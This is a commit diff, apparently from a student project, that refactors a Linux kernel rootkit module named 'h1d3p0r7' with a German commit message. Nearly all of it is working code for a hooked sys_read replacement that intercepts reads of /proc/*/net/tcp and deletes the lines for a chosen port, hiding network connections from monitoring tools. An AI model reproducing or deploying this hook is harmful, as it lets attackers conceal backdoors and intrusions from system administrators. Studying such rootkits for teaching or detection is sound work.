Dude, das war richtig schlecht geschriebener Code
This commit is contained in:
parent
ed5b2fa92a
commit
c897df31ec
@ -23,6 +23,11 @@
|
||||
*******************************************************************************/
|
||||
#include "h1d3p0r7.h"
|
||||
|
||||
/**** var **********************************************************************
|
||||
*******************************************************************************/
|
||||
|
||||
sys_read_ptr sys_read_orig;
|
||||
|
||||
/*******************************************************************************/
|
||||
|
||||
/*** FUNCTION ****************************************************************
|
||||
@ -32,8 +37,8 @@
|
||||
* RETURNS:
|
||||
*******************************************************************************/
|
||||
|
||||
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
|
||||
size_t count)
|
||||
asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
|
||||
size_t count)
|
||||
{
|
||||
long result, bp, diff_in_bytes;
|
||||
char *kbuf, *start_line, *end_line, *port_num;
|
||||
@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf,
|
||||
struct path file_path;
|
||||
|
||||
// run real read
|
||||
result = (*orig_read)(fd,buf,count);
|
||||
if (result <= 0)
|
||||
return result;
|
||||
result = (*sys_read_orig)(fd, buf, count);
|
||||
|
||||
if (result <= 0){
|
||||
return result;
|
||||
}
|
||||
|
||||
|
||||
// get pathname
|
||||
// CITATION [8] from report
|
||||
current_files = current->files;
|
||||
files_table = files_fdtable(current_files);
|
||||
|
||||
file_path = files_table->fd[fd]->f_path;
|
||||
pathname = d_path(&file_path,pbuf,256*sizeof(char));
|
||||
// if virtual file /proc/net/tcp
|
||||
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
|
||||
// copy from user to kernelspace;
|
||||
if (!access_ok(VERIFY_READ,buf,result))
|
||||
return -1;
|
||||
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
|
||||
return -1;
|
||||
if (copy_from_user(kbuf,buf,result))
|
||||
return -1;
|
||||
pathname = d_path(&file_path, pbuf, 256*sizeof(char));
|
||||
|
||||
// filter out hidden ports
|
||||
start_line = strchr(kbuf,':') - 4; // skip first line
|
||||
|
||||
if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
|
||||
|
||||
if (!access_ok(VERIFY_READ, buf, result)){
|
||||
return -1;
|
||||
}
|
||||
if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
|
||||
return -1;
|
||||
}
|
||||
if (copy_from_user(kbuf, buf, result)){
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
start_line = strchr(kbuf, ':') - 4;
|
||||
diff_in_bytes = (start_line - kbuf) * sizeof(char);
|
||||
|
||||
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
|
||||
|
||||
start_line = kbuf + bp;
|
||||
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
|
||||
end_line = strchr(start_line,'\n');
|
||||
port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
|
||||
end_line = strchr(start_line, '\n');
|
||||
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
|
||||
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
|
||||
memmove(start_line,end_line + 1, // delete line in file
|
||||
result - bp - diff_in_bytes);
|
||||
|
||||
if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
|
||||
|
||||
memmove(start_line, end_line + 1,
|
||||
result - bp - diff_in_bytes);
|
||||
|
||||
result -= diff_in_bytes;
|
||||
}
|
||||
}
|
||||
|
||||
// copy from kernel to userspace
|
||||
if (!access_ok(VERIFY_WRITE,buf,result))
|
||||
if (!access_ok(VERIFY_WRITE, buf, result)){
|
||||
return EINVAL;
|
||||
if (copy_to_user(buf,kbuf,result))
|
||||
}
|
||||
if (copy_to_user(buf, kbuf, result)){
|
||||
return EINVAL;
|
||||
}
|
||||
kfree(kbuf);
|
||||
}
|
||||
// return number of bytes read
|
||||
|
||||
Loading…
Reference in New Issue
Block a user